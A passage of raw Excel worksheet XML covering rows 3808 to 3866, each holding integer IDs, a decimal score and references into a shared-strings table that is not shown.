      <c r="E3808">
        <v>0.89740002155303955</v>
      </c>
      <c r="F3808" t="s">
        <v>5592</v>
      </c>
      <c r="G3808" t="s">
        <v>7532</v>
      </c>
      <c r="H3808" t="s">
        <v>7533</v>
      </c>
    </row>
    <row r="3809" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3809" s="1">
        <v>3807</v>
      </c>
      <c r="B3809">
        <v>7444</v>
      </c>
      <c r="C3809">
        <v>7444</v>
      </c>
      <c r="D3809">
        <v>2</v>
      </c>
      <c r="E3809">
        <v>0.69690001010894775</v>
      </c>
      <c r="F3809" t="s">
        <v>5592</v>
      </c>
      <c r="G3809" t="s">
        <v>7534</v>
      </c>
      <c r="H3809" t="s">
        <v>7535</v>
      </c>
    </row>
    <row r="3810" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3810" s="1">
        <v>3808</v>
      </c>
      <c r="B3810">
        <v>1034</v>
      </c>
      <c r="C3810">
        <v>1034</v>
      </c>
      <c r="D3810">
        <v>2</v>
      </c>
      <c r="E3810">
        <v>0.3562999963760376</v>
      </c>
      <c r="F3810" t="s">
        <v>5592</v>
      </c>
      <c r="G3810" t="s">
        <v>7536</v>
      </c>
      <c r="H3810" t="s">
        <v>7537</v>
      </c>
    </row>
    <row r="3811" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3811" s="1">
        <v>3809</v>
      </c>
      <c r="B3811">
        <v>1037</v>
      </c>
      <c r="C3811">
        <v>1037</v>
      </c>
      <c r="D3811">
        <v>2</v>
      </c>
      <c r="E3811">
        <v>0.50760000944137573</v>
      </c>
      <c r="F3811" t="s">
        <v>5592</v>
      </c>
      <c r="G3811" t="s">
        <v>7538</v>
      </c>
      <c r="H3811" t="s">
        <v>7539</v>
      </c>
    </row>
    <row r="3812" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3812" s="1">
        <v>3810</v>
      </c>
      <c r="B3812">
        <v>7439</v>
      </c>
      <c r="C3812">
        <v>7439</v>
      </c>
      <c r="D3812">
        <v>2</v>
      </c>
      <c r="E3812">
        <v>0.76499998569488525</v>
      </c>
      <c r="F3812" t="s">
        <v>5592</v>
      </c>
      <c r="G3812" t="s">
        <v>7540</v>
      </c>
      <c r="H3812" t="s">
        <v>7541</v>
      </c>
    </row>
    <row r="3813" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3813" s="1">
        <v>3811</v>
      </c>
      <c r="B3813">
        <v>1018</v>
      </c>
      <c r="C3813">
        <v>1018</v>
      </c>
      <c r="D3813">
        <v>2</v>
      </c>
      <c r="E3813">
        <v>0.63300001621246338</v>
      </c>
      <c r="F3813" t="s">
        <v>5592</v>
      </c>
      <c r="G3813" t="s">
        <v>7542</v>
      </c>
      <c r="H3813" t="s">
        <v>7543</v>
      </c>
    </row>
    <row r="3814" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3814" s="1">
        <v>3812</v>
      </c>
      <c r="B3814">
        <v>7410</v>
      </c>
      <c r="C3814">
        <v>7410</v>
      </c>
      <c r="D3814">
        <v>2</v>
      </c>
      <c r="E3814">
        <v>0.44459998607635498</v>
      </c>
      <c r="F3814" t="s">
        <v>5592</v>
      </c>
      <c r="G3814" t="s">
        <v>7544</v>
      </c>
      <c r="H3814" t="s">
        <v>7545</v>
      </c>
    </row>
    <row r="3815" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3815" s="1">
        <v>3813</v>
      </c>
      <c r="B3815">
        <v>7409</v>
      </c>
      <c r="C3815">
        <v>7409</v>
      </c>
      <c r="D3815">
        <v>2</v>
      </c>
      <c r="E3815">
        <v>0.99140000343322754</v>
      </c>
      <c r="F3815" t="s">
        <v>5592</v>
      </c>
      <c r="G3815" t="s">
        <v>7546</v>
      </c>
      <c r="H3815" t="s">
        <v>7547</v>
      </c>
    </row>
    <row r="3816" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3816" s="1">
        <v>3814</v>
      </c>
      <c r="B3816">
        <v>1103</v>
      </c>
      <c r="C3816">
        <v>1103</v>
      </c>
      <c r="D3816">
        <v>2</v>
      </c>
      <c r="E3816">
        <v>0.74959999322891235</v>
      </c>
      <c r="F3816" t="s">
        <v>5592</v>
      </c>
      <c r="G3816" t="s">
        <v>7548</v>
      </c>
      <c r="H3816" t="s">
        <v>7549</v>
      </c>
    </row>
    <row r="3817" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3817" s="1">
        <v>3815</v>
      </c>
      <c r="B3817">
        <v>1168</v>
      </c>
      <c r="C3817">
        <v>1168</v>
      </c>
      <c r="D3817">
        <v>2</v>
      </c>
      <c r="E3817">
        <v>0.99730002880096436</v>
      </c>
      <c r="F3817" t="s">
        <v>5592</v>
      </c>
      <c r="G3817" t="s">
        <v>7550</v>
      </c>
      <c r="H3817" t="s">
        <v>7551</v>
      </c>
    </row>
    <row r="3818" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3818" s="1">
        <v>3816</v>
      </c>
      <c r="B3818">
        <v>1170</v>
      </c>
      <c r="C3818">
        <v>1170</v>
      </c>
      <c r="D3818">
        <v>2</v>
      </c>
      <c r="E3818">
        <v>0.88889998197555542</v>
      </c>
      <c r="F3818" t="s">
        <v>5592</v>
      </c>
      <c r="G3818" t="s">
        <v>7552</v>
      </c>
      <c r="H3818" t="s">
        <v>7553</v>
      </c>
    </row>
    <row r="3819" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3819" s="1">
        <v>3817</v>
      </c>
      <c r="B3819">
        <v>1172</v>
      </c>
      <c r="C3819">
        <v>1172</v>
      </c>
      <c r="D3819">
        <v>2</v>
      </c>
      <c r="E3819">
        <v>0.55150002241134644</v>
      </c>
      <c r="F3819" t="s">
        <v>5592</v>
      </c>
      <c r="G3819" t="s">
        <v>7554</v>
      </c>
      <c r="H3819" t="s">
        <v>7555</v>
      </c>
    </row>
    <row r="3820" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3820" s="1">
        <v>3818</v>
      </c>
      <c r="B3820">
        <v>7380</v>
      </c>
      <c r="C3820">
        <v>7380</v>
      </c>
      <c r="D3820">
        <v>2</v>
      </c>
      <c r="E3820">
        <v>0.99309998750686646</v>
      </c>
      <c r="F3820" t="s">
        <v>5592</v>
      </c>
      <c r="G3820" t="s">
        <v>7556</v>
      </c>
      <c r="H3820" t="s">
        <v>7557</v>
      </c>
    </row>
    <row r="3821" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3821" s="1">
        <v>3819</v>
      </c>
      <c r="B3821">
        <v>1181</v>
      </c>
      <c r="C3821">
        <v>1181</v>
      </c>
      <c r="D3821">
        <v>2</v>
      </c>
      <c r="E3821">
        <v>0.99699997901916504</v>
      </c>
      <c r="F3821" t="s">
        <v>5592</v>
      </c>
      <c r="G3821" t="s">
        <v>7558</v>
      </c>
      <c r="H3821" t="s">
        <v>7559</v>
      </c>
    </row>
    <row r="3822" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3822" s="1">
        <v>3820</v>
      </c>
      <c r="B3822">
        <v>1182</v>
      </c>
      <c r="C3822">
        <v>1182</v>
      </c>
      <c r="D3822">
        <v>2</v>
      </c>
      <c r="E3822">
        <v>0.92640000581741333</v>
      </c>
      <c r="F3822" t="s">
        <v>5592</v>
      </c>
      <c r="G3822" t="s">
        <v>7560</v>
      </c>
      <c r="H3822" t="s">
        <v>7561</v>
      </c>
    </row>
    <row r="3823" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3823" s="1">
        <v>3821</v>
      </c>
      <c r="B3823">
        <v>1183</v>
      </c>
      <c r="C3823">
        <v>1183</v>
      </c>
      <c r="D3823">
        <v>2</v>
      </c>
      <c r="E3823">
        <v>0.76740002632141113</v>
      </c>
      <c r="F3823" t="s">
        <v>5592</v>
      </c>
      <c r="G3823" t="s">
        <v>7562</v>
      </c>
      <c r="H3823" t="s">
        <v>5865</v>
      </c>
    </row>
    <row r="3824" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3824" s="1">
        <v>3822</v>
      </c>
      <c r="B3824">
        <v>1184</v>
      </c>
      <c r="C3824">
        <v>1184</v>
      </c>
      <c r="D3824">
        <v>2</v>
      </c>
      <c r="E3824">
        <v>0.97579997777938843</v>
      </c>
      <c r="F3824" t="s">
        <v>5592</v>
      </c>
      <c r="G3824" t="s">
        <v>7563</v>
      </c>
      <c r="H3824" t="s">
        <v>7564</v>
      </c>
    </row>
    <row r="3825" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3825" s="1">
        <v>3823</v>
      </c>
      <c r="B3825">
        <v>1185</v>
      </c>
      <c r="C3825">
        <v>1185</v>
      </c>
      <c r="D3825">
        <v>2</v>
      </c>
      <c r="E3825">
        <v>0.54579997062683105</v>
      </c>
      <c r="F3825" t="s">
        <v>5592</v>
      </c>
      <c r="G3825" t="s">
        <v>7565</v>
      </c>
      <c r="H3825" t="s">
        <v>7566</v>
      </c>
    </row>
    <row r="3826" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3826" s="1">
        <v>3824</v>
      </c>
      <c r="B3826">
        <v>1186</v>
      </c>
      <c r="C3826">
        <v>1186</v>
      </c>
      <c r="D3826">
        <v>2</v>
      </c>
      <c r="E3826">
        <v>0.76740002632141113</v>
      </c>
      <c r="F3826" t="s">
        <v>5592</v>
      </c>
      <c r="G3826" t="s">
        <v>7567</v>
      </c>
      <c r="H3826" t="s">
        <v>5865</v>
      </c>
    </row>
    <row r="3827" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3827" s="1">
        <v>3825</v>
      </c>
      <c r="B3827">
        <v>7386</v>
      </c>
      <c r="C3827">
        <v>7386</v>
      </c>
      <c r="D3827">
        <v>2</v>
      </c>
      <c r="E3827">
        <v>0.99769997596740723</v>
      </c>
      <c r="F3827" t="s">
        <v>5592</v>
      </c>
      <c r="G3827" t="s">
        <v>7568</v>
      </c>
      <c r="H3827" t="s">
        <v>7569</v>
      </c>
    </row>
    <row r="3828" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3828" s="1">
        <v>3826</v>
      </c>
      <c r="B3828">
        <v>7378</v>
      </c>
      <c r="C3828">
        <v>7378</v>
      </c>
      <c r="D3828">
        <v>2</v>
      </c>
      <c r="E3828">
        <v>0.9968000054359436</v>
      </c>
      <c r="F3828" t="s">
        <v>5592</v>
      </c>
      <c r="G3828" t="s">
        <v>7570</v>
      </c>
      <c r="H3828" t="s">
        <v>7571</v>
      </c>
    </row>
    <row r="3829" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3829" s="1">
        <v>3827</v>
      </c>
      <c r="B3829">
        <v>7376</v>
      </c>
      <c r="C3829">
        <v>7376</v>
      </c>
      <c r="D3829">
        <v>2</v>
      </c>
      <c r="E3829">
        <v>0.72020000219345093</v>
      </c>
      <c r="F3829" t="s">
        <v>5592</v>
      </c>
      <c r="G3829" t="s">
        <v>7572</v>
      </c>
      <c r="H3829" t="s">
        <v>7573</v>
      </c>
    </row>
    <row r="3830" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3830" s="1">
        <v>3828</v>
      </c>
      <c r="B3830">
        <v>1193</v>
      </c>
      <c r="C3830">
        <v>1193</v>
      </c>
      <c r="D3830">
        <v>2</v>
      </c>
      <c r="E3830">
        <v>0.98040002584457397</v>
      </c>
      <c r="F3830" t="s">
        <v>5592</v>
      </c>
      <c r="G3830" t="s">
        <v>7574</v>
      </c>
      <c r="H3830" t="s">
        <v>7575</v>
      </c>
    </row>
    <row r="3831" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3831" s="1">
        <v>3829</v>
      </c>
      <c r="B3831">
        <v>7371</v>
      </c>
      <c r="C3831">
        <v>7371</v>
      </c>
      <c r="D3831">
        <v>2</v>
      </c>
      <c r="E3831">
        <v>0.55330002307891846</v>
      </c>
      <c r="F3831" t="s">
        <v>5592</v>
      </c>
      <c r="G3831" t="s">
        <v>7576</v>
      </c>
      <c r="H3831" t="s">
        <v>7577</v>
      </c>
    </row>
    <row r="3832" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3832" s="1">
        <v>3830</v>
      </c>
      <c r="B3832">
        <v>1200</v>
      </c>
      <c r="C3832">
        <v>1200</v>
      </c>
      <c r="D3832">
        <v>2</v>
      </c>
      <c r="E3832">
        <v>0.37130001187324518</v>
      </c>
      <c r="F3832" t="s">
        <v>5592</v>
      </c>
      <c r="G3832" t="s">
        <v>7578</v>
      </c>
      <c r="H3832" t="s">
        <v>7579</v>
      </c>
    </row>
    <row r="3833" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3833" s="1">
        <v>3831</v>
      </c>
      <c r="B3833">
        <v>1215</v>
      </c>
      <c r="C3833">
        <v>1215</v>
      </c>
      <c r="D3833">
        <v>2</v>
      </c>
      <c r="E3833">
        <v>0.99190002679824829</v>
      </c>
      <c r="F3833" t="s">
        <v>5592</v>
      </c>
      <c r="G3833" t="s">
        <v>7580</v>
      </c>
      <c r="H3833" t="s">
        <v>7581</v>
      </c>
    </row>
    <row r="3834" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3834" s="1">
        <v>3832</v>
      </c>
      <c r="B3834">
        <v>1218</v>
      </c>
      <c r="C3834">
        <v>1218</v>
      </c>
      <c r="D3834">
        <v>2</v>
      </c>
      <c r="E3834">
        <v>0.67070001363754272</v>
      </c>
      <c r="F3834" t="s">
        <v>5592</v>
      </c>
      <c r="G3834" t="s">
        <v>7582</v>
      </c>
      <c r="H3834" t="s">
        <v>7583</v>
      </c>
    </row>
    <row r="3835" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3835" s="1">
        <v>3833</v>
      </c>
      <c r="B3835">
        <v>1220</v>
      </c>
      <c r="C3835">
        <v>1220</v>
      </c>
      <c r="D3835">
        <v>2</v>
      </c>
      <c r="E3835">
        <v>0.3668999969959259</v>
      </c>
      <c r="F3835" t="s">
        <v>5592</v>
      </c>
      <c r="G3835" t="s">
        <v>7584</v>
      </c>
      <c r="H3835" t="s">
        <v>7585</v>
      </c>
    </row>
    <row r="3836" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3836" s="1">
        <v>3834</v>
      </c>
      <c r="B3836">
        <v>1223</v>
      </c>
      <c r="C3836">
        <v>1223</v>
      </c>
      <c r="D3836">
        <v>2</v>
      </c>
      <c r="E3836">
        <v>0.83310002088546753</v>
      </c>
      <c r="F3836" t="s">
        <v>5592</v>
      </c>
      <c r="G3836" t="s">
        <v>7586</v>
      </c>
      <c r="H3836" t="s">
        <v>7587</v>
      </c>
    </row>
    <row r="3837" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3837" s="1">
        <v>3835</v>
      </c>
      <c r="B3837">
        <v>1224</v>
      </c>
      <c r="C3837">
        <v>1224</v>
      </c>
      <c r="D3837">
        <v>2</v>
      </c>
      <c r="E3837">
        <v>0.58609998226165771</v>
      </c>
      <c r="F3837" t="s">
        <v>5592</v>
      </c>
      <c r="G3837" t="s">
        <v>7588</v>
      </c>
      <c r="H3837" t="s">
        <v>7589</v>
      </c>
    </row>
    <row r="3838" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3838" s="1">
        <v>3836</v>
      </c>
      <c r="B3838">
        <v>7349</v>
      </c>
      <c r="C3838">
        <v>7349</v>
      </c>
      <c r="D3838">
        <v>2</v>
      </c>
      <c r="E3838">
        <v>0.99970000982284546</v>
      </c>
      <c r="F3838" t="s">
        <v>5592</v>
      </c>
      <c r="G3838" t="s">
        <v>7590</v>
      </c>
      <c r="H3838" t="s">
        <v>7591</v>
      </c>
    </row>
    <row r="3839" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3839" s="1">
        <v>3837</v>
      </c>
      <c r="B3839">
        <v>7377</v>
      </c>
      <c r="C3839">
        <v>7377</v>
      </c>
      <c r="D3839">
        <v>2</v>
      </c>
      <c r="E3839">
        <v>0.99089998006820679</v>
      </c>
      <c r="F3839" t="s">
        <v>5592</v>
      </c>
      <c r="G3839" t="s">
        <v>7592</v>
      </c>
      <c r="H3839" t="s">
        <v>7593</v>
      </c>
    </row>
    <row r="3840" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3840" s="1">
        <v>3838</v>
      </c>
      <c r="B3840">
        <v>1486</v>
      </c>
      <c r="C3840">
        <v>1486</v>
      </c>
      <c r="D3840">
        <v>2</v>
      </c>
      <c r="E3840">
        <v>0.99709999561309814</v>
      </c>
      <c r="F3840" t="s">
        <v>5592</v>
      </c>
      <c r="G3840" t="s">
        <v>7594</v>
      </c>
      <c r="H3840" t="s">
        <v>7595</v>
      </c>
    </row>
    <row r="3841" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3841" s="1">
        <v>3839</v>
      </c>
      <c r="B3841">
        <v>1165</v>
      </c>
      <c r="C3841">
        <v>1165</v>
      </c>
      <c r="D3841">
        <v>2</v>
      </c>
      <c r="E3841">
        <v>0.72130000591278076</v>
      </c>
      <c r="F3841" t="s">
        <v>5592</v>
      </c>
      <c r="G3841" t="s">
        <v>7596</v>
      </c>
      <c r="H3841" t="s">
        <v>7597</v>
      </c>
    </row>
    <row r="3842" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3842" s="1">
        <v>3840</v>
      </c>
      <c r="B3842">
        <v>1161</v>
      </c>
      <c r="C3842">
        <v>1161</v>
      </c>
      <c r="D3842">
        <v>2</v>
      </c>
      <c r="E3842">
        <v>0.67869997024536133</v>
      </c>
      <c r="F3842" t="s">
        <v>5592</v>
      </c>
      <c r="G3842" t="s">
        <v>7598</v>
      </c>
      <c r="H3842" t="s">
        <v>7599</v>
      </c>
    </row>
    <row r="3843" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3843" s="1">
        <v>3841</v>
      </c>
      <c r="B3843">
        <v>7406</v>
      </c>
      <c r="C3843">
        <v>7406</v>
      </c>
      <c r="D3843">
        <v>2</v>
      </c>
      <c r="E3843">
        <v>0.9976000189781189</v>
      </c>
      <c r="F3843" t="s">
        <v>5592</v>
      </c>
      <c r="G3843" t="s">
        <v>7600</v>
      </c>
      <c r="H3843" t="s">
        <v>7601</v>
      </c>
    </row>
    <row r="3844" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3844" s="1">
        <v>3842</v>
      </c>
      <c r="B3844">
        <v>1110</v>
      </c>
      <c r="C3844">
        <v>1110</v>
      </c>
      <c r="D3844">
        <v>2</v>
      </c>
      <c r="E3844">
        <v>0.61720001697540283</v>
      </c>
      <c r="F3844" t="s">
        <v>5592</v>
      </c>
      <c r="G3844" t="s">
        <v>7602</v>
      </c>
      <c r="H3844" t="s">
        <v>7603</v>
      </c>
    </row>
    <row r="3845" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3845" s="1">
        <v>3843</v>
      </c>
      <c r="B3845">
        <v>1112</v>
      </c>
      <c r="C3845">
        <v>1112</v>
      </c>
      <c r="D3845">
        <v>2</v>
      </c>
      <c r="E3845">
        <v>0.93849998712539673</v>
      </c>
      <c r="F3845" t="s">
        <v>5592</v>
      </c>
      <c r="G3845" t="s">
        <v>7604</v>
      </c>
      <c r="H3845" t="s">
        <v>7605</v>
      </c>
    </row>
    <row r="3846" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3846" s="1">
        <v>3844</v>
      </c>
      <c r="B3846">
        <v>7402</v>
      </c>
      <c r="C3846">
        <v>7402</v>
      </c>
      <c r="D3846">
        <v>2</v>
      </c>
      <c r="E3846">
        <v>0.91740000247955322</v>
      </c>
      <c r="F3846" t="s">
        <v>5592</v>
      </c>
      <c r="G3846" t="s">
        <v>7606</v>
      </c>
      <c r="H3846" t="s">
        <v>7607</v>
      </c>
    </row>
    <row r="3847" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3847" s="1">
        <v>3845</v>
      </c>
      <c r="B3847">
        <v>1119</v>
      </c>
      <c r="C3847">
        <v>1119</v>
      </c>
      <c r="D3847">
        <v>2</v>
      </c>
      <c r="E3847">
        <v>0.50590002536773682</v>
      </c>
      <c r="F3847" t="s">
        <v>5592</v>
      </c>
      <c r="G3847" t="s">
        <v>7608</v>
      </c>
      <c r="H3847" t="s">
        <v>7609</v>
      </c>
    </row>
    <row r="3848" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3848" s="1">
        <v>3846</v>
      </c>
      <c r="B3848">
        <v>1120</v>
      </c>
      <c r="C3848">
        <v>1120</v>
      </c>
      <c r="D3848">
        <v>2</v>
      </c>
      <c r="E3848">
        <v>0.55870002508163452</v>
      </c>
      <c r="F3848" t="s">
        <v>5592</v>
      </c>
      <c r="G3848" t="s">
        <v>7610</v>
      </c>
      <c r="H3848" t="s">
        <v>7611</v>
      </c>
    </row>
    <row r="3849" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3849" s="1">
        <v>3847</v>
      </c>
      <c r="B3849">
        <v>1122</v>
      </c>
      <c r="C3849">
        <v>1122</v>
      </c>
      <c r="D3849">
        <v>2</v>
      </c>
      <c r="E3849">
        <v>0.53289997577667236</v>
      </c>
      <c r="F3849" t="s">
        <v>5592</v>
      </c>
      <c r="G3849" t="s">
        <v>7612</v>
      </c>
      <c r="H3849" t="s">
        <v>7613</v>
      </c>
    </row>
    <row r="3850" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3850" s="1">
        <v>3848</v>
      </c>
      <c r="B3850">
        <v>1130</v>
      </c>
      <c r="C3850">
        <v>1130</v>
      </c>
      <c r="D3850">
        <v>2</v>
      </c>
      <c r="E3850">
        <v>0.53350001573562622</v>
      </c>
      <c r="F3850" t="s">
        <v>5592</v>
      </c>
      <c r="G3850" t="s">
        <v>7614</v>
      </c>
      <c r="H3850" t="s">
        <v>7615</v>
      </c>
    </row>
    <row r="3851" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3851" s="1">
        <v>3849</v>
      </c>
      <c r="B3851">
        <v>1135</v>
      </c>
      <c r="C3851">
        <v>1135</v>
      </c>
      <c r="D3851">
        <v>2</v>
      </c>
      <c r="E3851">
        <v>0.8442000150680542</v>
      </c>
      <c r="F3851" t="s">
        <v>5592</v>
      </c>
      <c r="G3851" t="s">
        <v>7616</v>
      </c>
      <c r="H3851" t="s">
        <v>7617</v>
      </c>
    </row>
    <row r="3852" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3852" s="1">
        <v>3850</v>
      </c>
      <c r="B3852">
        <v>1136</v>
      </c>
      <c r="C3852">
        <v>1136</v>
      </c>
      <c r="D3852">
        <v>2</v>
      </c>
      <c r="E3852">
        <v>0.60039997100830078</v>
      </c>
      <c r="F3852" t="s">
        <v>5592</v>
      </c>
      <c r="G3852" t="s">
        <v>7618</v>
      </c>
      <c r="H3852" t="s">
        <v>7619</v>
      </c>
    </row>
    <row r="3853" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3853" s="1">
        <v>3851</v>
      </c>
      <c r="B3853">
        <v>1164</v>
      </c>
      <c r="C3853">
        <v>1164</v>
      </c>
      <c r="D3853">
        <v>2</v>
      </c>
      <c r="E3853">
        <v>0.55349999666213989</v>
      </c>
      <c r="F3853" t="s">
        <v>5592</v>
      </c>
      <c r="G3853" t="s">
        <v>7620</v>
      </c>
      <c r="H3853" t="s">
        <v>7621</v>
      </c>
    </row>
    <row r="3854" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3854" s="1">
        <v>3852</v>
      </c>
      <c r="B3854">
        <v>1137</v>
      </c>
      <c r="C3854">
        <v>1137</v>
      </c>
      <c r="D3854">
        <v>2</v>
      </c>
      <c r="E3854">
        <v>0.71369999647140503</v>
      </c>
      <c r="F3854" t="s">
        <v>5592</v>
      </c>
      <c r="G3854" t="s">
        <v>7622</v>
      </c>
      <c r="H3854" t="s">
        <v>7623</v>
      </c>
    </row>
    <row r="3855" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3855" s="1">
        <v>3853</v>
      </c>
      <c r="B3855">
        <v>1139</v>
      </c>
      <c r="C3855">
        <v>1139</v>
      </c>
      <c r="D3855">
        <v>2</v>
      </c>
      <c r="E3855">
        <v>0.77810001373291016</v>
      </c>
      <c r="F3855" t="s">
        <v>5592</v>
      </c>
      <c r="G3855" t="s">
        <v>7624</v>
      </c>
      <c r="H3855" t="s">
        <v>7625</v>
      </c>
    </row>
    <row r="3856" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3856" s="1">
        <v>3854</v>
      </c>
      <c r="B3856">
        <v>7398</v>
      </c>
      <c r="C3856">
        <v>7398</v>
      </c>
      <c r="D3856">
        <v>2</v>
      </c>
      <c r="E3856">
        <v>0.99150002002716064</v>
      </c>
      <c r="F3856" t="s">
        <v>5592</v>
      </c>
      <c r="G3856" t="s">
        <v>7626</v>
      </c>
      <c r="H3856" t="s">
        <v>7627</v>
      </c>
    </row>
    <row r="3857" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3857" s="1">
        <v>3855</v>
      </c>
      <c r="B3857">
        <v>1141</v>
      </c>
      <c r="C3857">
        <v>1141</v>
      </c>
      <c r="D3857">
        <v>2</v>
      </c>
      <c r="E3857">
        <v>0.50419998168945313</v>
      </c>
      <c r="F3857" t="s">
        <v>5592</v>
      </c>
      <c r="G3857" t="s">
        <v>7628</v>
      </c>
      <c r="H3857" t="s">
        <v>7629</v>
      </c>
    </row>
    <row r="3858" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3858" s="1">
        <v>3856</v>
      </c>
      <c r="B3858">
        <v>7397</v>
      </c>
      <c r="C3858">
        <v>7397</v>
      </c>
      <c r="D3858">
        <v>2</v>
      </c>
      <c r="E3858">
        <v>0.82700002193450928</v>
      </c>
      <c r="F3858" t="s">
        <v>5592</v>
      </c>
      <c r="G3858" t="s">
        <v>7630</v>
      </c>
      <c r="H3858" t="s">
        <v>7631</v>
      </c>
    </row>
    <row r="3859" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3859" s="1">
        <v>3857</v>
      </c>
      <c r="B3859">
        <v>1143</v>
      </c>
      <c r="C3859">
        <v>1143</v>
      </c>
      <c r="D3859">
        <v>2</v>
      </c>
      <c r="E3859">
        <v>0.56300002336502075</v>
      </c>
      <c r="F3859" t="s">
        <v>5592</v>
      </c>
      <c r="G3859" t="s">
        <v>7632</v>
      </c>
      <c r="H3859" t="s">
        <v>7633</v>
      </c>
    </row>
    <row r="3860" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3860" s="1">
        <v>3858</v>
      </c>
      <c r="B3860">
        <v>1147</v>
      </c>
      <c r="C3860">
        <v>1147</v>
      </c>
      <c r="D3860">
        <v>2</v>
      </c>
      <c r="E3860">
        <v>0.50950002670288086</v>
      </c>
      <c r="F3860" t="s">
        <v>5592</v>
      </c>
      <c r="G3860" t="s">
        <v>7634</v>
      </c>
      <c r="H3860" t="s">
        <v>7635</v>
      </c>
    </row>
    <row r="3861" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3861" s="1">
        <v>3859</v>
      </c>
      <c r="B3861">
        <v>1148</v>
      </c>
      <c r="C3861">
        <v>1148</v>
      </c>
      <c r="D3861">
        <v>2</v>
      </c>
      <c r="E3861">
        <v>0.99430000782012939</v>
      </c>
      <c r="F3861" t="s">
        <v>5592</v>
      </c>
      <c r="G3861" t="s">
        <v>7636</v>
      </c>
      <c r="H3861" t="s">
        <v>7637</v>
      </c>
    </row>
    <row r="3862" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3862" s="1">
        <v>3860</v>
      </c>
      <c r="B3862">
        <v>1150</v>
      </c>
      <c r="C3862">
        <v>1150</v>
      </c>
      <c r="D3862">
        <v>2</v>
      </c>
      <c r="E3862">
        <v>0.92960000038146973</v>
      </c>
      <c r="F3862" t="s">
        <v>5592</v>
      </c>
      <c r="G3862" t="s">
        <v>7638</v>
      </c>
      <c r="H3862" t="s">
        <v>7639</v>
      </c>
    </row>
    <row r="3863" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3863" s="1">
        <v>3861</v>
      </c>
      <c r="B3863">
        <v>1158</v>
      </c>
      <c r="C3863">
        <v>1158</v>
      </c>
      <c r="D3863">
        <v>2</v>
      </c>
      <c r="E3863">
        <v>0.99299997091293335</v>
      </c>
      <c r="F3863" t="s">
        <v>5592</v>
      </c>
      <c r="G3863" t="s">
        <v>7640</v>
      </c>
      <c r="H3863" t="s">
        <v>7641</v>
      </c>
    </row>
    <row r="3864" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3864" s="1">
        <v>3862</v>
      </c>
      <c r="B3864">
        <v>1159</v>
      </c>
      <c r="C3864">
        <v>1159</v>
      </c>
      <c r="D3864">
        <v>2</v>
      </c>
      <c r="E3864">
        <v>0.93400001525878906</v>
      </c>
      <c r="F3864" t="s">
        <v>5592</v>
      </c>
      <c r="G3864" t="s">
        <v>7642</v>
      </c>
      <c r="H3864" t="s">
        <v>7643</v>
      </c>
    </row>
    <row r="3865" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3865" s="1">
        <v>3863</v>
      </c>
      <c r="B3865">
        <v>1138</v>
      </c>
      <c r="C3865">
        <v>1138</v>
      </c>
      <c r="D3865">
        <v>2</v>
      </c>
      <c r="E3865">
        <v>0.5942000150680542</v>
      </c>
      <c r="F3865" t="s">
        <v>5592</v>
      </c>
      <c r="G3865" t="s">
        <v>7644</v>
      </c>
      <c r="H3865" t="s">
        <v>7645</v>
      </c>
    </row>
    <row r="3866" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3866" s="1">
        <v>3864</v>
      </c>
      <c r="B3866">
        <v>1488</v>
      </c>
      <c r="C3866">
        <v>1488</v>
      </c>
      <c r="D3866">
        <v>2</v>
      </c>
      <c r="E3866">
        <v>0.99800002574920654</v>
      </c>
      <c r="F3866" t="s">
        <v>5592</v>
      </c>
      <c r="G3866" t="s">
        <v>7646</v>
      </c>
